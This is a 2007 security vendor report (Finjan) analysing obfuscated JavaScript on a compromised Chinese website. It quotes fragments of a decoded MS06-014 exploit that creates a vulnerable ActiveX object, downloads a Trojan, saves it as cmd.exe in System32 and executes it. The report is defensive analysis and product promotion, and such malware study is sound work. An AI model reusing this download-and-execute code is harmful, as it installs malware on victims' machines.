Finjan Malicious Code Research Center. Malicious Page of the Month
|
|
- Merry Cummings
- 8 years ago
- Views:
Transcription
1 Finjan Malicious Code Research Center Malicious Page of the Month August 2007
2 Copyright Finjan Software Inc. and its affiliates and subsidiaries ( Finjan ). All rights reserved. All text and figures included in this publication are the exclusive property of Finjan and are for your personal and non-commercial use. You may not modify, copy, distribute, transmit, display, perform, reproduce, publish, license, create derivative works from, transfer, use or sell any part of its content in any way without the express permission in writing from Finjan. Information in this document is subject to change without notice and does not present a commitment or representation on the part of Finjan. The Finjan technology and/or products and/or software described and/or referenced to in this material are protected by registered and/or pending patents including U.S. Patents No , , , , , , , , , , , , , , , , and may be protected by other U.S. Patents, foreign patents, or pending applications. Finjan, Finjan logo, Vital Security, Vulnerability Anti.dote and Window-of-Vulnerability are trademarks or registered trademarks of Finjan. Sophos is a registered trademark of Sophos plc. McAfee is a registered trademark of McAfee Inc. Kaspersky is a registered trademark of Kaspersky Lab. SurfControl is a registered trademark of SurfControl plc. Microsoft and Microsoft Office are registered trademarks of Microsoft Corporation. All other trademarks are the trademarks of their respective owners. For additional information, please visit or contact one of our regional offices: USA 2025 Gateway Place Suite 180 San Jose, CA 95110, USA Toll Free: FINJAN 8 Tel: Fax: salesna@finjan.com Chrysler Building 405 Lexington Avenue, 35th Floor New York, NY 10174, USA Tel: Fax: salesna@finjan.com Israel/APAC Hamachshev St. 1, New Industrial Area Netanya, Israel Tel: +972 (0) Fax: +972 (0) salesint@finjan.com Europe Westmead House, Westmead, Farnborough, GU14 7LP, UK Tel: +44 (0) Fax: +44 (0) salesuk@finjan.com Alte Landstrasse 27, Ottobrun, Germany Tel: +49 (0) Fax: +49 (0) salesce@finjan.com Printerweg AD Amersfoort The Netherlands Tel: +31 (0) Fax: +31 (0) salesne@finjan.com info@finjan.com Internet: August 2007 i
3 Table of Contents 1 Introduction The Growing Ease of Malicious Code Propagation Obfuscated Code Revisited Using Legitimate Tools to Create Malicious Code Do Other Web Security Products Block This Malicious Code? Conclusion About MCRC About Finjan August 2007 ii
4 1 Introduction This analysis is geared towards helping our customers understand how current threats are created and the methodologies used by malware writers to heighten the infection rate and evade conventional security measures. Finjan s findings over the past months indicate that the use of code obfuscation is no longer considered a special technique, or it is a new trend in the web security field. Code obfuscation has become the de facto standard for malicious code propagation, so much so that coming across malicious code that is not obfuscated in some form is a rare occurrence. The obfuscation method is usually generated by one of the latest versions of the current toolkits, which are being sold on the Internet. For additional information on malicious toolkits for sale, please review the MPOM May For additional information on the evolution of code obfuscation in the web security field, please visit Finjan s Security Center. 1.1 The Growing Ease of Malicious Code Propagation Due to the rapid growth in the availability of malicious code on the web, security vendors are facing an uphill battle. Creating signatures for each and every exploit of the various toolkits is obviously an exhausting process. Nor are signature-based methods particularly effective, as the dynamic nature of the code obfuscation renders signaturing the underlying code almost impossible. While trying to keep pace with the new vulnerabilities and new security threats, security vendors also need to monitor the available toolkits and their various versions. Each toolkit usually provides several different exploits which can be updated and changed every day, if not every hour. Code obfuscation as a technique wasn't originally developed for spreading malicious content on the web, but rather was used for legitimate purposes. It can be easily generated by automated utilities. Such utilities are available on the web (some of them for free), and are very easy to use, especially by the crimeware authors. For additional information on Legitimate Obfuscation Utilities, please visit MCRC Blog post. This edition of the Malicious Page of the Month focuses on a successful exploitation using one of these utilities which was discovered in the wild. The malicious code was found on a high-traffic website, thus providing proof of concept for a widespread problem in the web security arena. August
5 2 Obfuscated Code Revisited Following is an example of a Chinese website being used for spreading malicious content. One of the URLs in the site contains malicious code which eventually results in the download and execution of a piece of crimeware on the victim machine. Figure 1 shows the growth in the site s traffic during July once the malicious content had been uploaded. Figure 1 Traffic rate of malicious site once a malicious content has been uploaded One of the malicious URLs is responsible for the installation of malicious ANI spoofed file, two iframes and one script on the end-user PC (see Figure 2). Each one points to a well written exploit of known vulnerabilities. Figure 2 Malicious URL found on the site contains malicious code Let s take a deeper look at the malicious JavaScript file which is being downloaded each time a user visits the above URL. The malicious file contains a sophisticated JavaScript code, nevertheless, just like a standard obfuscated code, a custom decryption function is used for dynamically executing the malicious code. Later we will show that this sophisticated script was generated August
6 through a free utility, developed by a JavaScript expert, and most likely not for malicious purposes. Figure 3 Obfuscated malicious JavaScript generated from a legitimate and free obfuscation utility It should be noted that the obfuscation technique used here is much more advanced from a technical standpoint than examples previously encountered in the wild, further raising the bar for security vendors. Full code analysis of the above script is available at MCRC Blog post. When decrypting the obfuscated code shown in Figure 3, a well known and very common exploit was exposed. This exploit uses the Microsoft Data Access Components Vulnerability (MS06-014). Its severity is categorized as highly critical, as it can result in remote code execution on the victim machine. Successful exploitation will result in downloading and running a crimeware Trojan on the victim machine. Following is a brief description of the attack. Step 1: Creating the vulnerable object: var qbicl3=window["document"]["createelement"]("object"); qbicl3["setattribute"]("classid","clsid:bd96c556-65a3-[removed]- 00C04FC29E36"); August
7 Step 2: Requesting the crimeware Trojan using AJAX technology. Saving it under the Windows\System32 folder on the victim machine, naming it cmd.exe and then executing it by using the Shell.Application object. try { dl=' var[removed]l3["createobject"]("microsoft.x"+"m"+"l"+"h"+"t"+"t"+"p","");var[removed]j7=hiymfh6["getspecialfolder"](0)[removed]n4["respon sebody"]); _5["SaveToFile"](fname1,2); [REMOVED]BuildPath"](j7+'\\system32','cmd.exe'); OWSDdEfq_8["ShellExecute"] 2.1 Using Legitimate Tools to Create Malicious Code The obfuscation technique and utility used in this case might lead one to believe that this looks like a case of legitimate code obfuscation, which by chance was not being signatured by security vendors. However, this is not a single instance. In addition to this example, Finjan s MCRC researchers have encountered several cases where malicious code is being obfuscated in the same way. The same obfuscation tool shown in the example above was also used for creating additional malicious content, which has been recently seen in the wild. And the same scenario presides once the malicious code is decrypted, several security vendors are able to detect the known exploits. However as long as the code is obfuscated, the malicious code bypasses these vendors products and users are exposed to well known security threats. So why not take some of the known exploits, obfuscate them using one or more of the free tools available on the web until one of them bypasses the most popular security applications, and load it up to the Internet? Crimeware authors can even use free online tools to test their code against a variety of security products before releasing them, in order to verify their ability to avoid detection. Unfortunately, it would appear that it is just a question of time until this very scenario takes place (all the tools are available for free). As this report shows, without the ability to understand what the obfuscated code tries to do behind the scenes, it becomes very hard to detect whether the code is malicious or not. Many signature-based products can identify the obfuscation function itself and have even created signatures for such instances. Now that hackers are using legitimate obfuscation utilities to mask malicious code, these scenarios cannot be blocked across the board by signature-based solutions, without the risk of introducing a major false positive problem. August
8 2.2 Do Other Web Security Products Block This Malicious Code? We posted the malicious file on in order to see how security solutions handle this sophisticated, yet easy to generate malicious file. Virustotal.com runs the code against 32 leading security products (see Figure 4) in a non-benchmark methodology, so using this online service is just a reference sample. According to the virustotal report, none of these security products detected the obfuscated JavaScript file, containing malicious code. Figure 4 Virus Total scanning report on the obfuscated malicious script (July 31, 2007) August
9 A second posting to Virustotal.com of the decrypted malicious file indicates that only 2 of the 32 security vendors were able to detect the decrypted malicious code. Figure 5 Virus Total scanning report on the encrypted malicious file August
10 3 Conclusion The way to detect modern malicious code is to be able to understand what the code intends to do, before it does it. As website content is becoming more volatile, and domain names can be set up for brief periods of time, the task of keeping track of the malicious content on the WWW is becoming ever more difficult. Attempts to pattern malicious code and create signatures, or to categorize known malicious sites, are clearly insufficient when it comes to providing adequate protection to today s dynamic web threats. As virtually all modern attacks use code obfuscation and other anti-forensic methods, security companies find it more difficult to put their hands on malicious code, analyze it in their labs and create a signature for it. Anti-virus, reputation-based services and URL filtering solutions are potentially limited in their ability to cope with attacks that make use of constantly changing malicious code. The only way to stop dynamically obfuscated code and similar types of advanced hacking techniques is to analyze and understand the code embedded within web content on-the-fly before it reaches the end users. Finjan detects and blocks malicious code that uses obfuscation and other types of antiforensic techniques. The figures below illustrate Finjan s detection of the malicious code presented in this report. Utilizing real-time content inspection technology, Finjan achieves the highest rate of malicious code detection and prevention, by analyzing each and every piece of web content in real-time, regardless of its original source. This is the preferred approach for identifying the true intent of the code that enables blocking it before it executes on the end user machine. Figure 6 Finjan Vital Security blocks access to the infected Chinese site August
11 Figure 7 Vital Security detailed scanning report on the obfuscated malicious file August
12 Figure 8 Vital Security scanning report on the decrypted malicious file 4 About MCRC Malicious Code Research Center (MCRC) is the leading research department at Finjan, dedicated to the research and detection of security vulnerabilities in Internet and applications as well as other popular applications. MCRC s goal is to continue to be steps ahead of hackers attempting to exploit open platforms and technologies to develop malicious code such as Spyware, Trojans, Phishing attacks, worm and viruses. MCRC researchers work with the world s leading software vendors to help patch their security holes, as well as contribute to the development of next generation defense tools for Finjan s proactive secure content management solutions. For more information, visit our MCRC subsite. August
13 5 About Finjan Finjan is a global provider of secure web gateway solutions for the enterprise market. Our real-time, appliance-based web security solutions deliver the most effective shield against web-borne threats, freeing enterprises to harness the web for maximum commercial results. Finjan s real-time web security solutions utilize patented behaviorbased technology to repel all types of crimeware threats arriving via the web, such as spyware, phishing, Trojans, obfuscated code and other malicious code, securing businesses against unknown and emerging threats, as well as known malware. Finjan's security solutions have received industry awards and recognition from leading analyst houses and publications, including IDC, Butler Group, SC Magazine, eweek, CRN, ITPro, PCPro, ITWeek, Network Computing, and Information Security. With Finjan s award-winning and widely used solutions, businesses can focus on implementing web strategies to realize their full organizational and commercial potential. For more information about Finjan, please visit August
Configuring Cisco Security MARS with Vital Security Syslog
Configuring Cisco Security MARS with Vital Security Syslog July 2007 Copyright 1996-2007. Finjan Software Inc. and its affiliates and subsidiaries ( Finjan ). All rights reserved. All text and figures
More informationTechnical Brief High Availability Policy Server
Technical Brief High Availability Policy Server Software Release 9.0 Copyright Copyright 1996-2008. Finjan Software Inc. and its affiliates and subsidiaries ( Finjan ). All rights reserved. All text and
More informationIntegrated SSL Scanning
Software Version 9.0 Copyright Copyright 1996-2008. Finjan Software Inc. and its affiliates and subsidiaries ( Finjan ). All rights reserved. All text and figures included in this publication are the exclusive
More informationBandwidth Monitoring December 2008
December 2008 Copyright Copyright 1996-2008. Finjan Software Inc.and its affiliates and subsidiaries ( Finjan ). All rights reserved. All text and figures included in this publication are the exclusive
More informationUser Identification and Authentication
User Identification and Authentication Vital Security 9.2 Copyright Copyright 1996-2008. Finjan Software Inc.and its affiliates and subsidiaries ( Finjan ). All rights reserved. All text and figures included
More informationIntegrated SSL Scanning
Version 9.2 SSL Enhancements Copyright 1996-2008. Finjan Software Inc. and its affiliates and subsidiaries ( Finjan ). All rights reserved. All text and figures included in this publication are the exclusive
More informationSymantec Advanced Threat Protection: Network
Symantec Advanced Threat Protection: Network DR150218C April 2015 Miercom www.miercom.com Contents 1.0 Executive Summary... 3 2.0 Overview... 4 2.1 Products Tested... 4 2.2. Malware Samples... 5 3.0 How
More informationWeb site security issues White paper November 2009. Maintaining trust: protecting your Web site users from malware.
Web site security issues White paper November 2009 Maintaining trust: protecting your Page 2 Contents 2 Is your Web site attacking your users? 3 Familiar culprit, new MO 6 A look at how legitimate Web
More informationMalware, Phishing, and Cybercrime Dangerous Threats Facing the SMB State of Cybercrime
How to Protect Your Business from Malware, Phishing, and Cybercrime The SMB Security Series Malware, Phishing, and Cybercrime Dangerous Threats Facing the SMB State of Cybercrime sponsored by Introduction
More informationAttack Intelligence Research Center Monthly Threat Report MalWeb Evolution and Predictions
Attack Intelligence Research Center Monthly Threat Report MalWeb Evolution and Predictions A l a d d i n. c o m / e S a f e Overview Web security has been struggling for a long time with its own definition.
More informationZscaler Cloud Web Gateway Test
Zscaler Cloud Web Gateway Test A test commissioned by Zscaler, Inc. and performed by AV-TEST GmbH. Date of the report: April15 th, 2016 Executive Summary In March 2016, AV-TEST performed a review of the
More informationChoose Your Own - Fighting the Battle Against Zero Day Virus Threats
Choose Your Weapon: Fighting the Battle against Zero-Day Virus Threats 1 of 2 November, 2004 Choose Your Weapon: Fighting the Battle against Zero-Day Virus Threats Choose Your Weapon: Fighting the Battle
More informationWhat Do You Mean My Cloud Data Isn t Secure?
Kaseya White Paper What Do You Mean My Cloud Data Isn t Secure? Understanding Your Level of Data Protection www.kaseya.com As today s businesses transition more critical applications to the cloud, there
More informationTaking a Proactive Approach to Patch Management. B e s t P r a c t i c e s G u i d e
B e s t P r a c t i c e s G u i d e It s a fact of business today: because of the economy, most organizations are asking everyone, including the IT staff, to do more with less. But tight budgets and the
More informationDefending Against Cyber Attacks with SessionLevel Network Security
Defending Against Cyber Attacks with SessionLevel Network Security May 2010 PAGE 1 PAGE 1 Executive Summary Threat actors are determinedly focused on the theft / exfiltration of protected or sensitive
More informationWebsense Web Security Solutions. Websense Web Security Gateway Websense Web Security Websense Web Filter Websense Hosted Web Security
Web Security Gateway Web Security Web Filter Hosted Web Security Web Security Solutions The Approach In the past, most Web content was static and predictable. But today s reality is that Web content even
More informationNetsweeper Whitepaper
Netsweeper Inc. Corporate Headquarters 104 Dawson Road Suite 100 Guelph, ON, Canada N1H 1A7 CANADA T: +1 (519) 826-5222 F: +1 (519) 826-5228 Netsweeper Whitepaper The Evolution of Web Security June 2010
More informationWhen Reputation is Not Enough. Barracuda Email Security Gateway s Predictive Sender Profiling. White Paper
When Reputation is Not Enough Barracuda Email Security Gateway s Predictive Sender Profiling White Paper As spam continues to evolve, Barracuda Networks remains committed to providing the highest level
More informationWebsense Web Security Solutions
Web Security Gateway Web Security Web Filter Hosted Web Security Web Security Solutions The Web 2.0 Challenge The Internet is rapidly evolving. Web 2.0 technologies are dramatically changing the way people
More informationCan Consumer AV Products Protect Against Critical Microsoft Vulnerabilities?
ANALYST BRIEF Can Consumer AV Products Protect Against Critical Microsoft Vulnerabilities? Author Randy Abrams Tested Products Avast Internet Security 7 AVG Internet Security 2012 Avira Internet Security
More informationApplication Security Backgrounder
Essential Intrusion Prevention System (IPS) & DoS Protection Knowledge for IT Managers October 2006 North America Radware Inc. 575 Corporate Dr., Lobby 1 Mahwah, NJ 07430 Tel: (888) 234-5763 International
More informationProtecting the Infrastructure: Symantec Web Gateway
Protecting the Infrastructure: Symantec Web Gateway 1 Why Symantec for Web Security? Flexibility and Choice Best in class hosted service, appliance, and virtual appliance (upcoming) deployment options
More informationWebsense Web Security Solutions. Websense Web Security Gateway Websense Web Security Websense Web Filter Websense Express Websense Hosted Web Security
Web Security Gateway Web Security Web Filter Express Hosted Web Security Web Security Solutions The Approach In the past, most Web content was static and predictable. But today s reality is that Web content
More informationWhite Paper. What the ideal cloud-based web security service should provide. the tools and services to look for
White Paper What the ideal cloud-based web security service should provide A White Paper by Bloor Research Author : Fran Howarth Publish date : February 2010 The components required of an effective web
More informationWildFire. Preparing for Modern Network Attacks
WildFire WildFire automatically protects your networks from new and customized malware across a wide range of applications, including malware hidden within SSL-encrypted traffic. WildFire easily extends
More informationWebsense: Worldwide Leader in Web Filtering Expands into Web Security
Global Headquarters: 5 Speen Street Framingham, MA 01701 USA P.508.872.8200 F.508.935.4015 www.idc.com VENDOR PROFILE Websense: Worldwide Leader in Web Filtering Expands into Web Security Brian E. Burke
More informationHow IT Can Enhance User Productivity with Dynamic Web Repair
White Paper How IT Can Enhance User Productivity with Dynamic Web Repair INTRODUCTION We all know that malware is a major concern for organizations worldwide. And with the mainstreaming of interactive
More informationInternet Explorer Exploit Protection ENTERPRISE BRIEFING REPORT
Internet Explorer Exploit Protection ENTERPRISE BRIEFING REPORT TESTED PRODUCTS: AVG Internet Security Network Edition v8.0 Kaspersky Total Space Security v6.0 McAfee Total Protection for Endpoint Sophos
More informationESET NOD32 ANTIVIRUS 9
ESET NOD32 ANTIVIRUS 9 Microsoft Windows 10 / 8.1 / 8 / 7 / Vista / XP Quick Start Guide Click here to download the most recent version of this document ESET NOD32 Antivirus provides state-of-the-art protection
More informationKaspersky Security Network
Kaspersky Security Network Kaspersky Security Network is a progressive technology implemented in the latest versions of Kaspersky Lab s personal products. When it comes to new malware, it ensures a prompt
More informationThe enemy within: Stop students from bypassing your defenses
The enemy within: Stop students from bypassing your defenses Computer literate K-12 students regularly use anonymizing proxies to bypass their school s web filters to access pornography, social networking,
More informationStatistical Analysis of Internet Security Threats. Daniel G. James
Statistical Analysis of Internet Security Threats Daniel G. James ABSTRACT The purpose of this paper is to analyze the statistics surrounding the most common security threats faced by Internet users. There
More informationESET NOD32 ANTIVIRUS 8
ESET NOD32 ANTIVIRUS 8 Microsoft Windows 8.1 / 8 / 7 / Vista / XP / Home Server 2003 / Home Server 2011 Quick Start Guide Click here to download the most recent version of this document ESET NOD32 Antivirus
More informationS3 Control and System Call Indirection
S3 Control Confirma Technology Brief November 2008 Confirma Product Support 11040 Main St., Suite 100, Bellevue, WA 98004-6368, USA Toll free: 877.274.3045 Local: 425.691.1595 Email: support@confirma.com
More informationCA Host-Based Intrusion Prevention System r8.1
PRODUCT BRIEF: CA HOST-BASED INTRUSION PREVENTION SYSTEM CA Host-Based Intrusion Prevention System r8.1 CA HOST-BASED INTRUSION PREVENTION SYSTEM (CA HIPS) BLENDS ENDPOINT FIREWALL, INTRUSION DETECTION,
More informationKaspersky Fraud Prevention: a Comprehensive Protection Solution for Online and Mobile Banking
Kaspersky Fraud Prevention: a Comprehensive Protection Solution for Online and Mobile Banking Today s bank customers can perform most of their financial activities online. According to a global survey
More informationTrends in Malware DRAFT OUTLINE. Wednesday, October 10, 12
Trends in Malware DRAFT OUTLINE Presentation Synopsis Security is often a game of cat and mouse as security professionals and attackers each vie to stay one step ahead of the other. In this race for dominance,
More informationDefending Against. Phishing Attacks
Defending Against Today s Targeted Phishing Attacks DeFending Against today s targeted phishing attacks 2 Introduction Is this email a phish or is it legitimate? That s the question that employees and
More informationENTERPRISE EPP COMPARATIVE ANALYSIS
ENTERPRISE EPP COMPARATIVE ANALYSIS Socially Engineered Malware Randy Abrams, Jayendra Pathak, Ahmed Garhy Tested Products Fortinet Fortigate 100D Management station Forticlient- 5.0.7.333 McAfee VirusScan
More informationSecure Computing s TrustedSource
The industry s most acclaimed reputation system Proactive security based on global intelligence. Secure Computing s TrustedSource One of the most important characteristics of enterprise security is proactive
More informationAdvanced Persistent. From FUD to Facts. A Websense Brief By Patrick Murray, Senior Director of Product Management
A Websense Brief By Patrick Murray, Senior Director of Product Management Advanced Persistent Threats: From FUD to Facts With Websense, you can stay a step ahead of the threats. From our roots in web filtering,
More informationUser Documentation Web Traffic Security. University of Stavanger
User Documentation Web Traffic Security University of Stavanger Table of content User Documentation... 1 Web Traffic Security... 1 University of Stavanger... 1 UiS Web Traffic Security... 3 Background...
More informationTypes of cyber-attacks. And how to prevent them
Types of cyber-attacks And how to prevent them Introduction Today s cybercriminals employ several complex techniques to avoid detection as they sneak quietly into corporate networks to steal intellectual
More informationITSC Training Courses Student IT Competence Programme SIIS1 Information Security
ITSC Training Courses Student IT Competence Programme SI1 2012 2013 Prof. Chan Yuen Yan, Rosanna Department of Engineering The Chinese University of Hong Kong SI1-1 Course Outline What you should know
More informationPROACTIVE PROTECTION MADE EASY
PROACTIVE PROTECTION AUTHOR: ANDREW NIKISHIN KASPERSKY LAB Heuristic Analyzer Policy-Based Security Intrusion Prevention System (IPS) Protection against Buffer Overruns Behaviour Blockers Different Approaches
More informationComparison of Firewall, Intrusion Prevention and Antivirus Technologies
White Paper Comparison of Firewall, Intrusion Prevention and Antivirus Technologies How each protects the network Juan Pablo Pereira Technical Marketing Manager Juniper Networks, Inc. 1194 North Mathilda
More informationAdvanced Persistent Threats
White Paper INTRODUCTION Although most business leaders and IT managers believe their security technologies adequately defend against low-level threats, instances of (APTs) have increased. APTs, which
More informationProtect Your Business and Customers from Online Fraud
DATASHEET Protect Your Business and Customers from Online Fraud What s Inside 2 WebSafe 5 F5 Global Services 5 More Information Online services allow your company to have a global presence and to conveniently
More informationESET SMART SECURITY 9
ESET SMART SECURITY 9 Microsoft Windows 10 / 8.1 / 8 / 7 / Vista / XP Quick Start Guide Click here to download the most recent version of this document ESET Smart Security is all-in-one Internet security
More informationESET SMART SECURITY 6
ESET SMART SECURITY 6 Microsoft Windows 8 / 7 / Vista / XP / Home Server Quick Start Guide Click here to download the most recent version of this document ESET Smart Security provides state-of-the-art
More informationWindows Updates vs. Web Threats
Windows Updates vs. Web Threats HOW WELL DO WINDOWS UPDATES PROTECT AGAINST MALWARE? Dennis Technology Labs www.dennistechnologylabs.com Follow @DennisTechLabs on Twitter.com This test explores how much
More informationThe Dirty Secret Behind the UTM: What Security Vendors Don t Want You to Know
The Dirty Secret Behind the UTM: What Security Vendors Don t Want You to Know I n t r o d u c t i o n Until the late 1990s, network security threats were predominantly written by programmers seeking notoriety,
More informationWhat s Wrong with Information Security Today? You are looking in the wrong places for the wrong things.
What s Wrong with Information Security Today? You are looking in the wrong places for the wrong things. AGENDA Current State of Information Security Data Breach Statics Data Breach Case Studies Why current
More informationWhat you need to know to keep your computer safe on the Internet
What you need to know to keep your computer safe on the Internet Tip 1: Always install Operating System updates The most important steps for any computer user is to always install updates, especially security
More informationBoston University Security Awareness. What you need to know to keep information safe and secure
What you need to know to keep information safe and secure Introduction Welcome to Boston University s Security Awareness training. Depending on your reading speed, this presentation will take approximately
More information10 Things Every Web Application Firewall Should Provide Share this ebook
The Future of Web Security 10 Things Every Web Application Firewall Should Provide Contents THE FUTURE OF WEB SECURITY EBOOK SECTION 1: The Future of Web Security SECTION 2: Why Traditional Network Security
More informationStreamlining Web and Email Security
How to Protect Your Business from Malware, Phishing, and Cybercrime The SMB Security Series Streamlining Web and Email Security sponsored by Introduction to Realtime Publishers by Don Jones, Series Editor
More informationG DATA Mobile Malware Report
Threat report: Q4/2015 G DATA Mobile Malware Report 66 % 53 % Worldwide, 66 percent use an Android device 53 Percent of European mobile device owners use their smartphone or tablet for online banking (Source:
More informationThe Microsoft JPEG Vulnerability and the Six New Content Security Requirements
The Microsoft JPEG Vulnerability and the Six New Content Security Requirements Table of Contents OVERVIEW...3 1. THE VULNERABILITY DESCRIPTION...3 2. NEEDED: A NEW PARADIGM IN CONTENT SECURITY...4 3. PRACTICAL
More informationNetDefend Firewall UTM Services
Product Highlights Intrusion Prevention System Dectects and prevents known and unknown attacks/ exploits/vulnerabilities, preventing outbreaks and keeping your network safe. Gateway Anti Virus Protection
More informationTop five strategies for combating modern threats Is anti-virus dead?
Top five strategies for combating modern threats Is anti-virus dead? Today s fast, targeted, silent threats take advantage of the open network and new technologies that support an increasingly mobile workforce.
More informationThe Benefits of SSL Content Inspection ABSTRACT
The Benefits of SSL Content Inspection ABSTRACT SSL encryption is the de-facto encryption technology for delivering secure Web browsing and the benefits it provides is driving the levels of SSL traffic
More informationHope is not a strategy. Jérôme Bei
Hope is not a strategy Jérôme Bei Press Highlights Conficker hits German Government! 3000 Clients down! Datatheft at German Telekom: 17.000.000 Customer Records lost! About 1.000.000 pieces of Malware
More informationWEB ATTACKS AND COUNTERMEASURES
WEB ATTACKS AND COUNTERMEASURES February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in
More informationCyber Essentials Scheme
Cyber Essentials Scheme Requirements for basic technical protection from cyber attacks June 2014 December 2013 Contents Contents... 2 Introduction... 3 Who should use this document?... 3 What can these
More informationINSTANT MESSAGING SECURITY
INSTANT MESSAGING SECURITY February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in part
More informationTrend Micro Incorporated reserves the right to make changes to this document and to the products described herein without notice.
Trend Micro Incorporated reserves the right to make changes to this document and to the products described herein without notice. Before installing and using the software, please review the readme files,
More informationWEBTHREATS. Constantly Evolving Web Threats Require Revolutionary Security. Securing Your Web World
Securing Your Web World WEBTHREATS Constantly Evolving Web Threats Require Revolutionary Security ANTI-SPYWARE ANTI-SPAM WEB REPUTATION ANTI-PHISHING WEB FILTERING Web Threats Are Serious Business Your
More informationBenefits of Machine Learning. with Behavioral Analysis in Detection of Advanced Persistent Threats WHITE PAPER
Benefits of Machine Learning with Behavioral Analysis in Detection of Advanced Persistent Threats WHITE PAPER Overview The Evolution of Advanced Persistent Threat Detection Computer viruses have plagued
More informationINSIDE. Malicious Threats of Peer-to-Peer Networking
Symantec Security Response WHITE PAPER Malicious Threats of Peer-to-Peer Networking by Eric Chien, Symantec Security Response INSIDE Background Protocols New Vector of Delivery Malicious Uses of Peer-to-Peer
More informationSecuring end-user mobile devices in the enterprise
IBM Global Technology Services Thought Leadership White Paper January 2012 Securing end-user mobile devices in the enterprise Develop an enforceable mobile security policy and practices for safer corporate
More informationA New Approach to Assessing Advanced Threat Solutions
A New Approach to Assessing Advanced Threat Solutions December 4, 2014 A New Approach to Assessing Advanced Threat Solutions How Well Does Your Advanced Threat Solution Work? The cyber threats facing enterprises
More informationFOR MAC. Quick Start Guide. Click here to download the most recent version of this document
FOR MAC Quick Start Guide Click here to download the most recent version of this document ESET Cyber Security Pro provides state-of-the-art protection for your computer against malicious code. Based on
More informationProtection for Mac and Linux computers: genuine need or nice to have?
Protection for Mac and Linux computers: genuine need or nice to have? The current risk to computers running non-windows platforms is small but growing. As Mac and Linux computers become more prevalent
More informationCurrent Threat Scenario and Recent Attack Trends
Current Threat Scenario and Recent Attack Trends Anil Sagar Additional Director Indian Computer Emergency Response Team (CERT-In) Objectives Current Cyber space Nature of cyberspace and associated risks
More informationNetDefend Firewall UTM Services
NetDefend Firewall UTM Services Unified Threat Management D-Link NetDefend UTM firewalls integrate an Intrusion Prevention System (IPS), gateway AntiVirus (AV), and Web Content Filtering (WCF) for superior
More informationModern Cyber Threats. how yesterday s mind set gets in the way of securing tomorrow s critical infrastructure. Axel Wirth
Modern Cyber Threats how yesterday s mind set gets in the way of securing tomorrow s critical infrastructure Axel Wirth Healthcare Solutions Architect Distinguished Systems Engineer AAMI 2013 Conference
More informationEvaluating the Perceptions of People towards Online Security
Section 2 Information Systems Security & Web Technologies and Security Evaluating the Perceptions of People towards Online Security Abstract N.K.Jayakumar and A.D.Phippen Network Research Group, University
More information2. From a control perspective, the PRIMARY objective of classifying information assets is to:
MIS5206 Week 13 Your Name Date 1. When conducting a penetration test of an organization's internal network, which of the following approaches would BEST enable the conductor of the test to remain undetected
More informationCyber Security Solutions for Small Businesses Comparison Report: A Sampling of Cyber Security Solutions Designed for the Small Business Community
Cyber Security Solutions for Small Businesses Comparison Report: A Sampling of Cyber Security Solutions Designed for the Small Business Community A Sampling of Cyber Security Solutions Designed for the
More informationEndpoint Security: Moving Beyond AV
Endpoint Security: Moving Beyond AV An Ogren Group Special Report July 2009 Introduction Application whitelisting is emerging as the security technology that gives IT a true defense-in-depth capability,
More informationWillem Wiechers 3 rd March 2015
Willem Wiechers 3 rd March 2015 1 Why do we want Malware & Virus Protection? To make our computers save Wish to keep our data private Wish to have a safe environment to do our online banking, shopping,
More informationWEB PROTECTION. Features SECURITY OF INFORMATION TECHNOLOGIES
WEB PROTECTION Features SECURITY OF INFORMATION TECHNOLOGIES The web today has become an indispensable tool for running a business, and is as such a favorite attack vector for hackers. Injecting malicious
More informationEdge-based Virus Scanning
APPLICATION NOTE Edge-based Virus Scanning 658 Gibraltar Court Milpitas, CA 95035 Phone: 408-635-8400 Fax: 408-635-8470 www.servgate.com i Edge-based Virus Scanning APPLICATION NOTE All product names referenced
More informationZone Labs Integrity Smarter Enterprise Security
Zone Labs Integrity Smarter Enterprise Security Every day: There are approximately 650 successful hacker attacks against enterprise and government locations. 1 Every year: Data security breaches at the
More informationActive Threat Control
Active Threat Control Proactive Protection Against New and Emerging Threats Why You Should Read this White Paper The unprecedented rise of new threats has deemed traditional security mechanisms both ineffective
More informationInternet basics 2.3 Protecting your computer
Basics Use this document with the glossary Beginner s guide to Internet basics 2.3 Protecting your computer How can I protect my computer? This activity will show you how to protect your computer from
More informationGOING BEYOND BLOCKING AN ATTACK
Websense Executive Summary GOING BEYOND BLOCKING AN ATTACK WEBSENSE TRITON VERSION 7.7 Introduction We recently announced several new advanced malware and data theft protection capabilities in version
More informationSOLUTION CARD WHITE PAPER
WHITE PAPER Why Education is Among the Worst Affected Industries by Malware The Contradiction Between Perceived Anti-Virus Readiness and Actual Malware Infection Rates in the Education Industry About This
More informationwhite paper Malware Security and the Bottom Line
Malware Security Report: Protecting Your BusineSS, Customers, and the Bottom Line Contents 1 Malware is crawling onto web sites everywhere 1 What is Malware? 2 The anatomy of Malware attacks 3 The Malware
More informationComputer Security Maintenance Information and Self-Check Activities
Computer Security Maintenance Information and Self-Check Activities Overview Unlike what many people think, computers are not designed to be maintenance free. Just like cars they need routine maintenance.
More informationBest Practices in Deploying Anti-Malware for Best Performance
The Essentials Series: Increasing Performance in Enterprise Anti-Malware Software Best Practices in Deploying Anti-Malware for Best Performance sponsored by by Eric Schmidt Be st Practices in Deploying
More informationA progressive and integrated approach to protecting corporate networks
A progressive and integrated approach to protecting corporate networks Kaspersky Open Space Security is a suite of products that offers security coverage for all types of network endpoints, from mobile
More informationQUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY
QUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY EXPLOIT KITS UP 75 PERCENT The Infoblox DNS Threat Index, powered by IID, stood at 122 in the third quarter of 2015, with exploit kits up 75 percent
More informationMcAfee Global Threat Intelligence File Reputation Service. Best Practices Guide for McAfee VirusScan Enterprise Software
McAfee Global Threat Intelligence File Reputation Service Best Practices Guide for McAfee VirusScan Enterprise Software Table of Contents McAfee Global Threat Intelligence File Reputation Service McAfee
More informationComputer Viruses: How to Avoid Infection
Viruses From viruses to worms to Trojan Horses, the catchall term virus describes a threat that's been around almost as long as computers. These rogue programs exist for the simple reason to cause you
More informationNext-Generation Endpoint Security Beats Malware Variants Through Behavior-Based Analysis
Technology Spotlight Next-Generation Endpoint Security Beats Malware Variants Through Behavior-Based Analysis Sponsored by: Stormshield Duncan Brown January 2016 INTRODUCTION Enterprises are increasingly
More information